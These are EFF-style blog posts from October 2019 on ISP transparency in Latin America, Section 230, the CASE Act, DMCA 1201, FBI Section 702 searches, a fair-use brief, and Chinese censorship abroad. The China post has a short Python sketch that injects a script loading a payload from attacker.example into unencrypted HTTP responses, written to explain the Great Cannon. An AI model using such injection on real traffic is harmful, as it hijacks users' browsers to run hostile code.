Four years have passed since our partners first published Who Defends Your Data (¿Quién Defiende Tus Datos?), a report that holds ISPs accountable for their privacy policies and processes in eight Latin American countries and Spain. Since then, we’ve seen major technology companies provide more transparency about how and when they divulge their users’ data to the government. This shift has been fueled in large part by public attention in local media. The project started in 2015 in Colombia, Mexico, and Peru; Brazil joined in 2016, Chile and Paraguay in 2017, Argentina and Spain in 2018, and Panama this year.

When we started in 2015, none of the ISPs in the three countries surveyed had published transparency reports or any aggregate data about the number of data requests they received from governments. As of 2019, the larger global companies with a regional presence in the nine countries surveyed are doing this. This is a big victory for transparency, accountability, and users’ rights.

Telefónica (Movistar/Vivo), a global company with a local presence in Spain and in 15 countries in Latin America, has been leading the way in the region, closely followed by Millicom (Tigo) with offices in seven countries in South and Central America. Far behind is Claro (America Movil) with offices in 16 countries in the region. Surprisingly, in one country, Chile, the small ISP WOM! has also stood out for its excellent transparency reporting.

Telefónica publishes transparency reports in each of the countries we surveyed, while Millicom (Tigo) publishes transparency reports with data aggregated by region. In South America, Millicom (Tigo) publishes aggregate data for Bolivia, Colombia, and Paraguay; in 2018, it also published a comprehensive transparency report for Colombia alone. Claro (America Movil) operates in 16 countries in the region but has published a transparency report in only one of the countries we surveyed, Chile. Chilean ISPs such as WOM!, VTR, and Entel have all also published their own transparency reports. In Brazil, Telefónica (Vivo) is the only company that has published one.

All of the reports still have plenty of room for improvement. The level of information disclosed varies significantly company by company, and even country by country. Telefónica usually discloses separate aggregate numbers for different types of government requests—such as wiretapping, metadata, service suspension, and content blocking and filtering—in its transparency reports. But for Argentina, Telefónica provides only a single aggregate figure covering every kind of request. And in Brazil, Telefónica has not published the number of government requests it accepts or rejects, although it has published that information in other countries.

Companies in the region have also adopted other voluntary standards, like publishing their law enforcement guidelines for government data demands. For example, Telefónica provides an overview of the company’s global procedure for handling government data requests. Four other companies operating in Chile, including the small ISP WOM! and Entel, the largest national telecom company, publish more precise guidelines adapted to that country’s legal framework.

A Breakdown by Country

Colombia and Paraguay 

In 2015, the ¿Quién Defiende Tus Datos? project showed that keeping the pressure on—and having an open dialogue with—companies pays off. In Colombia, Fundación Karisma’s 2015 report investigated five local ISPs and found that none published transparency reports on government blocking requests or data demands. By 2018, five of seven companies had published annual transparency reports on data requests, with four providing information on government blocking requests.

Millicom’s Transparency Report stood out by clarifying the rules for government access to data in Colombia and Paraguay.  Both countries have adopted draconian laws that compel Internet Service Providers to grant direct access to their mobile network to authorities. In Colombia, the law establishes hefty fines if ISPs monitor interception taking place in their systems. This is why tech companies claim they do not possess information about how often and for what periods communications interception is carried out in their mobile networks. In this scenario, transparency reports become irrelevant. Conversely, in Paraguay, ISPs can view the judicial order requesting the interception, and the telecom company is aware when interception occurs in their system, and could potentially publish aggregate data about the number of data requests.

Brazil and Chile

InternetLab’s report shows progress in companies’ commitment to judicially challenge abusive law enforcement data requests or fight back against legislation that harms users’ privacy. In 2016, four of six companies took this kind of action. For example, the mobile companies featured in the research are part of an association that challenged before the Brazilian Supreme Court a law that allows law enforcement agents to access users’ data without a warrant in cases of human trafficking (Law 13.344/2016). The case is still open. Claro has also judicially challenged a direct request by the police to access subscriber data. This number remained high in 2018, when five out of eight ISPs fought against unconstitutional laws; two of them also challenged disproportionate measures.

In contrast, ISPs in Chile have been hesitant to challenge illegal and excessive requests. Derechos Digitales’ 2019 report indicates that many ISPs are still failing to confront such requests in the courts on behalf of their users—except one. Entel earned top marks because, of the several ISPs contacted for the same information, it was the only one to refuse a government request for an individual’s data.

Chilean ISPs WOM!, VTR, Claro, and Entel also make clear in their law enforcement guidelines that a prior judicial order is needed before handing content and metadata over to authorities. In Derechos Digitales’ 2019 report, these four companies, out of the six featured in the research, published law enforcement guidelines. None of them had taken these steps in 2017, the project’s first year of operation in Chile.

An even more significant achievement can be seen in user notification. ISPs in the region have always been reluctant to lay out a proper procedure for alerting users of government data requests, which was reflected in Chile's 2017 report. In the latest edition, however, WOM!, VTR, and Claro in Chile explicitly commit to user notification in their policies.


Peru

In Peru, three of five companies didn’t publish privacy policies in 2015. By 2019, only one failed to provide details on the collection, use, and processing of their users’ personal data. Hiperderecho’s 2019 report also shows progress in companies’ commitment to demand judicial orders before handing over users’ data. Bitel and Claro explicitly demand warrants when the request is for content. Telefónica (Movistar) stands out by requiring a warrant for both content and metadata. In 2015, only Movistar demanded a warrant for the content of the communication.

Way Forward

Despite the progress seen in Brazil, Colombia, Chile, and Peru, there’s still a lot to be done in those countries. We also need to wait for upcoming evaluations of Argentina, Panama, Paraguay, and Spain, which only recently joined the project. But overall, too many telecom companies—whether large or small, global or local—still don’t publish law enforcement guidelines or haven’t established proper procedures for government access to users’ information. Those guidelines should be grounded in the national legal framework and the country’s international human rights commitments.

Companies in the region equally fall short in committing to require a judicial order before handing over metadata to authorities. Finally, ISPs in the region are still wary of notifying users when governments request their information. Notice is crucial for ensuring users’ ability to challenge a request and to seek remedies when it’s unlawful or disproportionate. The same fear keeps many ISPs from publicly defending their users in court and in Congress.


For more information, see https://www.eff.org/qdtd and the relevant media coverage about our partners’ reports in Colombia, Paraguay, Brazil, Peru, Argentina, Spain, Chile, Mexico, and Panama.

EFF Defends Section 230 in Congress

EFF - Wed, 10/16/2019 - 9:55am
Watch EFF Legal Director Corynne McSherry Defend the Essential Law Protecting Internet Speech

All of us have benefited from Section 230, a federal law that has promoted the creation of virtually every open platform and communication tool on the Internet. The law’s premise is simple: if you are not the original creator of speech found on the Internet, you are not held liable if it does harm. But this simple premise is under attack in Congress. If some lawmakers get their way, the Internet could become a more restrictive space very soon.

EFF Legal Director Corynne McSherry will testify in support of Section 230 today in a House Energy and Commerce Committee hearing called “Fostering a Healthier Internet to Protect Consumers.” You can watch the hearing live on YouTube and follow along with our commentary @EFFLive.


In McSherry’s written testimony, she lays out the case for why a strong Section 230 is essential to online community, innovation, and free expression.

Section 230 has ushered in a new era of community and connection on the Internet. People can find friends old and new over the Internet, learn, share ideas, organize, and speak out. Those connections can happen organically, often with no involvement on the part of the platforms where they take place. Consider that some of the most vital modern activist movements—#MeToo, #WomensMarch, #BlackLivesMatter—are universally identified by hashtags.

McSherry also cautions Congress to consider the unintended consequences of forcing online platforms to over-censor their users. When platforms take on overly restrictive and non-transparent moderation processes, marginalized people are often silenced disproportionately.

Without Section 230—or with a weakened Section 230—online platforms would have to exercise extreme caution in their moderation decisions in order to limit their own liability. A platform with a large number of users can’t remove all unlawful speech while keeping everything else intact. Therefore, undermining Section 230 effectively forces platforms to put their thumbs on the scale—that is, to remove far more speech than only what is actually unlawful, censoring innocent people and often important speech in the process.

Finally, McSherry urges Congress to consider the unintended consequences of last year’s Internet censorship bill, FOSTA, before it further undermines Section 230.

FOSTA teaches that Congress should carefully consider the unintended consequences of this type of legislation, recognizing that any law that puts the onus on online platforms to discern and remove illegal posts will result in over-censorship. Most importantly, it should listen to the voices most likely to be taken offline.

Read McSherry's full testimony.

Congressional Hearing Wednesday: EFF Will Urge Lawmakers to Protect Important Internet Free Speech Law

EFF - Tue, 10/15/2019 - 4:56pm
EFF Legal Director to Testify about How Consumers Benefit from CDA 230

Washington, D.C. – On Wednesday, Oct. 16, Electronic Frontier Foundation (EFF) Legal Director Corynne McSherry will testify at a congressional hearing in support of Section 230 of the Communications Decency Act (CDA)—one of the most important laws protecting Internet speech.

CDA 230 shields online platforms from liability for content posted by users, meaning websites and online services can’t be punished in court for things that their users say online. McSherry will tell lawmakers that the law protects a broad swath of online speech, from forums for neighborhood groups and local newspapers, to ordinary email practices like forwarding and websites where people discuss their views about politics, religion, and elections.

The law has played a vital role in providing a voice to those who previously lacked one, enabling marginalized groups to get their messages out to the whole world. At the same time, CDA 230 allows providers of all sizes to make choices about how to design and moderate their platforms. McSherry will tell lawmakers that weakening CDA 230 will encourage private censorship of valuable content and cement the dominance of those tech giants that can afford to shoulder new regulatory burdens.

McSherry is one of six witnesses who will testify at the House Committee on Energy and Commerce hearing on Wednesday, entitled “Fostering a Healthier Internet to Protect Consumers.”  Other witnesses include law professor Danielle Citron, and representatives from YouTube and reddit.

House Committee on Energy and Commerce
“Fostering a Healthier Internet to Protect Consumers”

EFF Legal Director Corynne McSherry

Wednesday, Oct 16
10 am

2123 Rayburn House Office Building
John D. Dingell Room
45 Independence Ave SW
Washington, DC  20515

Contact:
Corynne McSherry, Legal Director, corynne@eff.org
India McKinney, Deputy Director of Federal Affairs, india@eff.org

Hearing Thursday: EFF’s Rainey Reitman Will Urge California Lawmakers to Balance Needs of Consumers In Developing Cryptocurrency Regulations

EFF - Tue, 10/15/2019 - 1:13pm
Consumer Protection and Choice Should be Paramount

Whittier, California—On Thursday, Oct. 17, at 10 am, EFF Chief Program Officer Rainey Reitman will urge California lawmakers to prioritize consumer choice and privacy in developing cryptocurrency regulations.

Reitman will testify at a hearing convened by the California Assembly Committee on Banking and Finance. The session, Virtual Currency Businesses: The Market and Regulatory Issues, will explore the business, consumer, and regulatory issues in the cryptocurrency market. EFF supports regulators stepping in to hold accountable those engaging in fraud, theft, and other misleading cryptocurrency business practices. But EFF has been skeptical of many regulatory proposals that are vague, that are designed for only one type of technology, that could dissuade future privacy-enhancing innovation, or that might entrench existing players to the detriment of upstart innovators.

Reitman will tell lawmakers that cryptocurrency regulations should protect consumers but not chill future technological innovations that will benefit them.

WHAT: Informational Hearing of the California Assembly Committee on Banking  and Finance

WHO: EFF Chief Program Officer Rainey Reitman

WHEN: Thursday, October 17, 10 am

WHERE: Rio Hondo Community College
               Campus Inn
               600 Workman Mill Rd.
               Whittier, California 90601

Contact:
Rainey Reitman, Chief Program Officer, rainey@eff.org

Today: Tell Congress Not to Pass Another Bad Copyright Law

EFF - Tue, 10/15/2019 - 8:36am

Today, Congress is back in session after a two-week break. Now that they’re back, we’re asking you to take a few minutes to call and tell them not to pass the Copyright Alternative in Small-Claims Enforcement (CASE) Act. The CASE Act would create an obscure board inside the U.S. Copyright Office which would be empowered to levy huge penalties against people accused of copyright infringement. It could have devastating effects on regular Internet users and little-to-no effect on true infringers. We know the CASE Act won’t work because we’ve seen similar “solutions” fail before.

Take Action

Tell Congress not to bankrupt users for regular Internet activity

The CASE Act is supposed to help artists by making it easy to make copyright infringement claims and collect “small” amounts of recompense. However, neither the problem of infringement nor this proposed solution is simple.

The CASE Act would allow copyright infringement claims to be filed with a “Copyright Claims Board” staffed by “copyright claims officers,” who would then decide the merits of each claim and how much is owed to the claimant. What the CASE Act doesn’t do is make sure those decisions meet the same requirements and standards that copyright claims must follow in real courts. For example, filing a copyright infringement claim in court requires a valid copyright registration, so that there is a verifiable record of the owner and the date of creation of the work at issue. The CASE Act has no such requirement for claims before the Copyright Claims Board, removing one of the important safeguards for making sure copyright claims are actually valid. The result could be two different kinds of copyright cases, with the kind created by the Copyright Claims Board being almost impossible to appeal.

We already know how dangerous it can be to free expression when systems make copyright claims easy and counterclaims difficult and intimidating. The Digital Millennium Copyright Act’s (DMCA) takedown procedures have given us many, many examples. A critic used them to suppress criticism of his own criticism. A group called “Straight Pride UK” used them to bury an interview that made it look bad. The makers of a Nazi romance movie used them against people making fun of how bad it was. The CASE Act does not adequately consider the free speech implications of making copyright claims easy to bring.

The CASE Act would also set a limit of $30,000 in penalties per proceeding. In a world where almost 40% of Americans would struggle to cover an emergency expense of $400, the Copyright Claims Board would have enormous power to ruin the lives of ordinary Americans.

This problem has been glossed over in a number of ways. One is emphasis on the supposedly “small claims” nature of the bill, made most clearly by Representative Doug Collins of Georgia, who laughed off the need to discuss this bill by saying the $30,000 limit amounted to “truly small claims.” Another is an emphasis on the “voluntary” nature of the CASE Act.

The CASE Act is described as voluntary not because everyone involved has agreed to be there, but because everyone involved has not not agreed. It’s as complicated as it sounds.

The CASE Act would allow people who receive notice of a claim from this brand-new Copyright Claims Board to get out of the proceedings by telling the Copyright Office they would like to opt out. However, the CASE Act doesn’t have any requirements about what “opting out” looks like, other than that it has to be in accordance with regulations created by the Copyright Office itself.

That is no guarantee that opting out will be simple or easy. The Copyright Office’s regulations do not tend towards being easy reading for the average person. We see that every three years, when the Copyright Office issues its exemptions for Section 1201 of the DMCA.

Section 1201 bans circumventing access controls on copyrighted works. It also empowers the Copyright Office to create exemptions to this prohibition. In certain circumstances—often ones rooted in free expression—you have the right to use copyrighted material without permission or payment to the owner. And that “you” means everybody, not just people who make a living as documentary filmmakers, security researchers, and so on. However, the Copyright Office continues to make its exemptions too complicated for regular people without lawyers to understand and use.

Given this history, it seems more likely than not that, if the CASE Act became law, the Copyright Office would continue in this vein. That is, its regulations would not be easy to read and comply with. And the decisions of the claims board would focus less on issues of fair use and free expression and more on technicalities and serving the desires of copyright holders.

In this environment, copyright trolls and worse would flourish. Copyright trolls make their money through copyright lawsuits, rather than through any legitimate creation. They are not fictional, nor are they a problem of the past. The CASE Act would make it easy for trolls to file a lot of claims. Not only could the trolls collect on those claims, but they could use the $30,000 limit to get their targets to agree to pay less, just to avoid the chance of a huge judgment being awarded by the board. And like in the case of the DMCA takedown system, most regular Internet users would find themselves in a scary, expensive situation if they tried to fight back.

DMCA takedown abuse has become a favorite tactic for scammers, and although the law makes it possible to go after fraudulent takedowns and counterclaims, it only happens in rare and extreme situations.

Because the system the CASE Act would create is so uneven, and stands to be so complicated, small copyright holders looking for a way to hold bad actors accountable are not going to find it workable. Regular Internet users will be trapped, while those with money, and sophisticated infringers, will be able to navigate whatever opt-out system the Copyright Office creates.

So far this year, Congress has rushed the CASE Act through, without holding any hearings where its flaws could be publicly explained and debated. The CASE Act has passed out of committee in both the House and the Senate. Now that Congress is back in D.C., they need to hear from regular Internet users about how dangerous the CASE Act is for them. That’s why we’re asking you to call Congress today and tell your members of Congress to vote “no” on the CASE Act.

One Weird Law That Interferes With Security Research, Remix Culture, and Even Car Repair

EFF - Fri, 10/11/2019 - 7:37pm

How can a single, ill-conceived law wreak havoc in so many ways? It prevents you from making remix videos. It blocks computer security research. It keeps those with print disabilities from reading ebooks. It makes it illegal to repair people's cars. It makes it harder to compete with tech companies by designing interoperable products. It's even been used in an attempt to block third-party ink cartridges for printers.

It's hard to believe, but these are just some of the consequences of Section 1201 of the Digital Millennium Copyright Act, which gives legal teeth to "access controls" like DRM. Courts have mostly interpreted the law as abandoning the traditional limitations on copyright's scope, such as fair use, in favor of a strict regime that penalizes any bypassing of access controls on a copyrighted work, regardless of your noninfringing purpose and regardless of the fact that you own that copy of the work.

Since software can be copyrighted, companies have increasingly argued that you cannot even look at the code that controls a device you own, which would mean that you're not allowed to understand the technology on which you rely — let alone learn how to tinker with it or spot vulnerabilities or undisclosed features that violate your privacy, for instance.

Given how terrible Section 1201 is, we sued the government on behalf of security researcher Matthew Green and innovator Andrew "bunnie" Huang — and his company, Alphamax. Our clients want to engage in important speech and they want to empower others to do the same — even when access controls get in the way.

The case was dormant for over two years while we waited for a ruling from the judge on a preliminary matter, but it is finally moving once again, with several of our clients' First Amendment claims going forward. Last month, we asked the court to prohibit the unconstitutional enforcement of the law.

That has gotten the attention of the copyright cartels, who are likely to oppose our motion later this month. In their opinion, the already astronomical penalties for actual copyright infringement aren't enough to address the perceived problem, and the collateral damage to our freedom of speech and to our understanding of the technology around us is an acceptable loss in their war to control the distribution of cultural works.

EFF is proud to help our clients take on both the Department of Justice and one of the most powerful lobbying groups in the country—to fight for your freedoms and for a better world where we are free to understand the technology all around us and to participate in creating culture together.

Related Cases: Green v. U.S. Department of Justice

Secret Court Rules That the FBI’s “Backdoor Searches” of Americans Violated the Fourth Amendment

EFF - Fri, 10/11/2019 - 7:33pm
But the Court Misses the Larger Problem: Section 702’s Mass Surveillance is Inherently Unconstitutional

EFF has long maintained that it is impossible to conduct mass surveillance and still protect the privacy and constitutional rights of innocent Americans, much less the human rights of innocent people around the world.

This week, we were once again proven right. We learned new and disturbing information about the FBI’s repeated and unjustified searches of Americans’ information contained in massive databases of communications collected using the government’s Section 702 mass surveillance program.

A series of newly unsealed rulings from the federal district and appellate courts tasked with overseeing foreign surveillance show that the FBI has been unable to comply with even modest oversight rules Congress placed on “backdoor searches” of Americans by the FBI.  Instead, the Bureau routinely abuses its ability to search through this NSA-collected information for purposes unrelated to Section 702’s intended national security purposes.

The size of the problem is staggering. The Foreign Intelligence Surveillance Court (FISC) held that “the FBI has conducted tens of thousands of unjustified queries of Section 702 data.” The FISC found that the FBI created an “unduly lax” environment in which “maximal use” of these invasive searches was “a routine and encouraged practice.”

But as is too often the case, the secret surveillance courts let the government off easy. Although the FISC initially ruled the FBI’s backdoor search procedures violated the Fourth Amendment in practice, the ultimate impact of the ruling was quite limited. After the government appealed, the FISC allowed the FBI to continue to use backdoor searches to invade people’s privacy—even in investigations that may have nothing to do with national security or foreign intelligence—so long as it follows what the appeals court called a “modest ministerial procedure.” Basically, this means requiring FBI agents to document more clearly why they were searching the giant 702 databases for information about Americans.

Rather than simply requiring a bit more documentation, we believe the court should have imposed a real constitutional solution: it should require the FBI to get a warrant before searching for people’s communications.

Ultimately, these orders follow a predictable path. First, they document horrific and systemic constitutional abuses. Then, they respond with small administrative adjustments. They highlight how judges sitting on the secret surveillance courts seem to have forgotten their primary role of protecting innocent Americans from unconstitutional government actions. Instead, those judges become lost in a thicket of administrative procedures aimed at providing a thin veil of privacy protection while allowing the real violations to continue.

Even when these judges are alerted to actual violations of the law, which have been occurring for more than a decade, they retreat from what should now be clear as day: Section 702 is itself unconstitutional. The law allows the government to sweep up people’s communications and records of communications and amass them in a database for later warrantless searching by the FBI. This can be done for reasons unrelated to national security, much less supported by probable cause.

No amount of “ministerial” adjustments can cure Section 702’s Fourth Amendment problems, which is why EFF has been fighting to halt this mass surveillance for more than a decade.

Opinion Shows FBI Engaged in Lawless, Unconstitutional Backdoor Searches of Americans

These rulings arose from a routine operation of Section 702—the FISC’s annual review of the government’s “certifications,” the high-level descriptions of its plans for conducting 702 surveillance. Unlike traditional FISA surveillance, the FISC does not review individualized, warrant-like applications under Section 702, and instead signs off on programmatic documents like “targeting” and “minimization” procedures. Unlike regular warrants, the individuals affected by the searches are never given notice, much less able to seek a remedy for misuse. Yet, even under this limited (and we believe insufficient) judicial review, the FISC has repeatedly found deficiencies in the intelligence community’s procedures, and this most recent certification was no different.

Specifically, among the problems the FISC noticed were deficiencies in the FBI’s backdoor search procedures. The court noted that in 2018, Congress directed the FBI to record every time it searched a database of communications collected under Section 702 for a term associated with a U.S. person, but that the Bureau was simply keeping a record of every such search it ran on any person, without flagging which ones involved U.S. persons. In addition, it was not making any record of why it was running these searches, meaning it could search for Americans’ communications without a lawful national security purpose. The court ordered the government to submit information, and also took the opportunity to appoint amici to counter the otherwise one-sided arguments by the government, a procedure given to the court as part of the 2015 USA Freedom Act (and which EFF had strongly advocated for).

As the FBI provided more information to the secret court, it became apparent just how flagrant the FBI’s disregard for the statute was. The court found no justification for the FBI’s refusal to record queries of Americans’ identifiers, and concluded that the agency was simply disobeying the will of Congress.

Even more disturbing was the FBI’s misuse of backdoor searches, which is when the FBI looks through people’s communications collected under Section 702 without a warrant, often for domestic law enforcement purposes. Since the beginning of Section 702, the FBI has avoided quantifying its use of backdoor searches, but we have known that its queries dwarfed other agencies’. In the October 2018 FISC opinion, we get a window into just how disparate the FBI’s search numbers are. In 2017, the NSA, CIA, and National Counterterrorism Center (NCTC) “collectively used approximately 7500 terms associated with U.S. persons to query content information acquired under Section 702.” Meanwhile, the FBI ran 3.1 million queries against a single database alone. Even the FISC itself did not get a full accounting of the FBI’s queries that year, or what percentage involved Americans’ identifiers, but the court noted that “given the FBI's domestic focus it seems likely that a significant percentage of its queries involve U.S.-person query terms.”

The court went on to explain that the lax—and sometimes nonexistent—oversight of these backdoor searches generated significant misuse. Examples reported by the government included tens of thousands of “batch queries” in which the FBI searched identifiers en masse on the basis that one of them would return foreign intelligence information. The court described a hypothetical involving suspicion that an employee of a government contractor was selling information about classified technology, in which the FBI would search identifiers belonging to all 100 of the contractor’s employees.

As the court observed, these “compliance” issues demonstrated “fundamental misunderstandings” about the statutory and administrative limits on use of Section 702 information, which is supposed to be “reasonably likely to return foreign intelligence information.” Worse, because the FBI did not document its agents’ justifications for running these queries, “it appears entirely possible that further querying violations involving large numbers of U.S.-person query terms have escaped the attention of overseers and have not been reported to the Court.”

With the benefit of input from its appointed amici, the FISC initially saw these violations for what they were: a massive violation of Americans’ Fourth Amendment rights. Unfortunately, the court let the FBI off with a relatively minor modification of its backdoor search query procedures, and made no provision for those impacted by these violations to ever be formally notified, so that they could seek their own remedies. Instead, going forward, FBI personnel must document when they use U.S. person identifiers to run backdoor searches—as required by Congress—and they must describe why these queries are likely to return foreign intelligence.  That’s it.

Even as to this requirement, which was already what the law required, there are several exceptions and loopholes. This means that, at least in some cases, the FBI can still trawl through massive databases of warrantlessly collected communications using Americans’ names, phone numbers, Social Security numbers, and other information, and then use the contents of those communications for investigations that have nothing to do with national security.

Secret Court Rulings Are Important, But Miss the Larger Problems With Section 702 Mass Surveillance

It is disturbing that in response to widespread unconstitutional abuses by the FBI, the courts charged with protecting people’s privacy and overseeing the government’s surveillance programs required FBI officials to just do more paperwork. The fact that such a remedy was seen as appropriate underscores how abstract ordinary people’s privacy—and the Fourth Amendment’s protections—have become for both FISC judges and the appeals judges above them on the Foreign Intelligence Court of Review (FISCR).

But the fact that judges view protecting people’s privacy rights through the abstract lens of procedures is also the fault of Congress and the executive branch, which continue to push the fiction that mass surveillance programs operating under Section 702 can be squared with the Fourth Amendment. They cannot be.

First, Section 702 allows widespread collection (seizure) of people’s Internet activities and communications without a warrant, and the subsequent use of that information (search) for general criminal purposes as well as national security purposes. Such untargeted surveillance and the accompanying privacy invasions are anathema to our constitutional right to privacy and resemble a secret general warrant to search anyone, at any time.

Second, rather than judges deciding in specific cases whether the government has probable cause to justify its surveillance of particular people or groups, the FISC’s role under Section 702 is relegated to approving general procedures that the government says are designed to protect people’s privacy overall. Instead of serving as a neutral magistrate that protects individual privacy, the court is several steps removed from the actual people caught up in the government’s mass surveillance. This allows judges to decide people’s rights in the abstract, without ever having to notify the people involved, much less provide them with a remedy for violations. It also makes the FISC more likely to view procedures and paperwork as sufficient to safeguard people’s Fourth Amendment rights. And it’s why individual civil cases like our Jewel v. NSA case are so necessary.

As the Supreme Court stated in Riley v. California, “the Founders did not fight a revolution to gain the right to government agency protocols.” Yet such abstract agency protocols are precisely what the FISC endorses and applies here with regard to your constitutionally protected communications.

Third, because Section 702 allows the government to amass vast stores of people’s communications and explicitly authorizes the FBI to search it, it encourages the very privacy abuses the FISC’s 2018 opinion details. These Fourth Amendment violations are significant and problematic. But because the FISC is so far removed from overseeing the FBI’s access to the data, it does not consider the most basic protections required by the Constitution: requiring agents to get a warrant.

We hope that these latest revelations are a wake-up call for Congress to act and repeal Section 702 or, at minimum, to require the FBI to get individual warrants, approved by a court, before beginning their backdoor searches. And while we believe current law allows our civil litigation, Congress can also remove government roadblocks by providing clear, unequivocal notice, as well as an individual remedy for those injured by any FBI, NSA, or CIA violations of this right. We also hope that the FISC itself will object to serving as a mere administrative oversight body, and instead push for more stringent protections for people’s privacy and pay more attention to the inherent constitutional problems of Section 702.

But no matter what, EFF will continue to push its legal challenges to the government’s mass surveillance program and will work to bring an end to unconstitutional mass surveillance.

Related Cases: Jewel v. NSA

EFF to Court: Parody Book Combining Dr. Seuss and Star Trek Themes Is Fair Use

EFF - Fri, 10/11/2019 - 3:40pm
Mash-up is Transformative Work Protected by Copyright Law

San Francisco—The Electronic Frontier Foundation (EFF) urged a federal appeals court today to rule that the creators of a parody book called “Oh The Places You’ll Boldly Go!”—a mash-up of Dr. Seuss and Star Trek themes—didn’t infringe copyrights in the Dr. Seuss classic “Oh The Places You’ll Go!”

The illustrated, crowdsourced book combines elements found in Dr. Seuss children’s books, like the look of certain characters and landscapes, with themes and characters from the sci-fi television series Star Trek, to create a new, transformative work of creative expression, EFF said in a brief filed today.

Dr. Seuss Enterprises, which licenses Seuss material, sued the book’s creators for copyright infringement. A lower court correctly concluded that the way in which the “Boldly” book borrows and builds upon copyrighted material in the Dr. Seuss book constitutes fair use under U.S. copyright law. EFF, represented by Harvard Law School’s Cyberlaw Clinic and joined by Public Knowledge, the Organization for Transformative Works, Professor Francesca Coppa, comic book writer Magdalene Visaggio, and author David Mack, asked the U.S. Court of Appeals for the Ninth Circuit to uphold the decision.

“The fair use doctrine recognizes that artists and creators must have the freedom to build upon existing culture to create new works that enrich, entertain, and amuse the public,” said EFF Legal Director Corynne McSherry. “Fair use is the safety valve that ensures creators like the authors of ‘Oh The Places You’ll Boldly Go!’ don’t have to beg permission from a copyright holder in order to make works that express new and unique ideas.”

“Oh The Places You’ll Boldly Go!” takes characters and images from five Dr. Seuss books and remakes them into comedic depictions of Captain Kirk, Mr. Spock, and various Star Trek creatures. The book’s visual puns—the multi-color saucer from the cover of “Oh The Places You’ll Go!” is used to create a new kind of starship Enterprise, while a Dr. Seuss character referred to as a “fix-it-up-chappie” is reimagined as Scotty, the ship’s chief engineer—are a form of commentary on the Seuss and Star Trek worlds.

“‘Boldly’s’ creative adaptation of Dr. Seuss works is an example of artistic expression that would be stifled by overly restrictive application of copyright law,” said McSherry.

Contact: Corynne McSherry, Legal Director, corynne@eff.org

China’s Global Reach: Surveillance and Censorship Beyond the Great Firewall

EFF - Thu, 10/10/2019 - 5:46pm

Those outside the People’s Republic of China (PRC) are accustomed to thinking of the Internet censorship practices of the Chinese state as primarily domestic, enacted through the so-called "Great Firewall"—a system of surveillance and blocking technology that prevents Chinese citizens from viewing websites outside the country. The Chinese government’s justification for that firewall is based on the concept of “Internet sovereignty.” The PRC has long declared that “within Chinese territory, the internet is under the jurisdiction of Chinese sovereignty.”

Hong Kong, as part of the "one country, two systems" agreement, has largely lived outside that firewall: foreign services like Twitter, Google, and Facebook are available there, and local ISPs have made clear that they will oppose direct state censorship of its open Internet.

But the ongoing Hong Kong protests, and mainland China's pervasive attempts to disrupt and discredit the movement globally, have highlighted that China is not above trying to extend its reach beyond the Great Firewall, and beyond its own borders. In attempting to silence protests that lie outside the Firewall, in full view of the rest of the world, China is showing its hand, and revealing the tools it can use to silence dissent or criticism worldwide.

Some of those tools—such as pressure on private entities, including American companies like the NBA and Blizzard—have caught U.S. headlines and outraged customers and employees of those companies. Others have been more technical, and less obvious to Western observers.

The “Great Cannon” takes aim at sites outside the Firewall

The Great Cannon is a large-scale technology deployed by ISPs based in China to inject JavaScript code into customers’ insecure (HTTP) requests. This code weaponizes the millions of mainland Chinese Internet connections that pass through these ISPs. When users visit insecure websites, their browsers will also download and run the government’s malicious JavaScript—which will cause them to send additional traffic to sites outside the Great Firewall, potentially slowing those websites down for other users, or overloading them entirely.
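To make the mechanism concrete, here is a minimal, hypothetical Python sketch of what an on-path party can do to an unencrypted HTTP response. The `tamper` function and the attacker URL are invented for illustration; this is not the actual Great Cannon code, which has never been published in full. The point is simply that anyone who can rewrite plaintext traffic can add a script to the page before it reaches the browser, and that HTTPS prevents exactly this, because any in-transit modification breaks the connection's integrity protection.

```python
# Hypothetical illustration: an on-path party rewriting an unencrypted
# HTTP response to add its own script. All names and URLs are invented.
INJECTED = '<script src="https://attacker.example/payload.js"></script>'

def tamper(http_response_body: str) -> str:
    """Insert a script tag into an unencrypted HTML response in transit."""
    if "</body>" in http_response_body:
        # Slip the script in just before the closing body tag.
        return http_response_body.replace("</body>", INJECTED + "</body>", 1)
    # No body tag found: append the script at the end instead.
    return http_response_body + INJECTED

page = "<html><body>Hello</body></html>"
tampered = tamper(page)
assert INJECTED in tampered  # the browser would now fetch and run the payload
```

With HTTPS, a middlebox that altered the response like this would cause the TLS record authentication to fail, and the browser would abort the connection rather than render the page.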

The Great Cannon’s debut in 2015 took down Github, where Chinese users were hosting anti-censorship software and mirrors of otherwise-banned news outlets like the New York Times. Following widespread international backlash, this attack was halted.

Last month, the Great Cannon was activated once again, aiming this time at Hong Kong protestors. It briefly took down LIHKG, a Hong Kong social media platform central to organizing this summer’s protests.

Targeting the global Chinese community through malware

Pervasive online surveillance is a fact of life within the Chinese mainland. But if the communities the Chinese government wants to surveil aren’t at home, it is increasingly willing to invest in expensive zero-days to watch them abroad, or to hold their families at home hostage.

Last month, security researchers uncovered several expensive and involved mobile malware campaigns targeting the Uyghur and Tibetan diasporas. One constituted a broad “watering hole” attack using several zero-days to target visitors of Uyghur-language websites.

As we’ve noted previously, this represents a sea change in how zero-days are being used; while China continues to target specific high-profile individuals in spear-phishing campaigns, it is now unafraid to cast a much wider net in order to place its surveillance software on entire ethnic and political groups outside China’s borders.

Censoring Chinese Apps Abroad

At home, China doesn’t need to use zero-days to install its own code on individuals’ personal devices. Chinese messaging and browser app makers are required to build government filtering into their clients, too. That means that when you use an app created by a mainland Chinese company, it likely contains code intended to scan and block prohibited websites or language.

Until now, China has been largely content to keep the activation of this device-side censorship concentrated within its borders. The keyword filtering embedded in WeChat only occurs for users with a mainland Chinese phone number. Chinese-language versions of domestic browsers censor and surveil significantly more than the English-language versions. But as Hong Kong and domestic human rights abuses draw international interest, the temptation to enforce Chinese policy abroad has grown.
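As a rough illustration of how this kind of device-side filtering can work, here is a hypothetical Python sketch. The function name, blocklist, and region check are invented for illustration rather than drawn from any real app's code, but they mirror the reported behavior: the same filtering logic ships to everyone, and is switched on only for accounts registered in a particular region.

```python
# Hypothetical sketch of device-side keyword filtering. The blocklist
# terms and the region gate are invented for illustration only.
BLOCKLIST = {"example banned phrase", "another banned phrase"}

def allowed(message: str, user_region: str) -> bool:
    """Return False if the message should be blocked on this device.

    Filtering is activated per-region: accounts registered outside the
    gated region are never checked against the blocklist at all.
    """
    if user_region != "CN":
        return True
    text = message.lower()
    return not any(term in text for term in BLOCKLIST)

# The identical message passes or fails depending only on the account's region.
assert allowed("this contains another banned phrase", "US")
assert not allowed("this contains another banned phrase", "CN")
```

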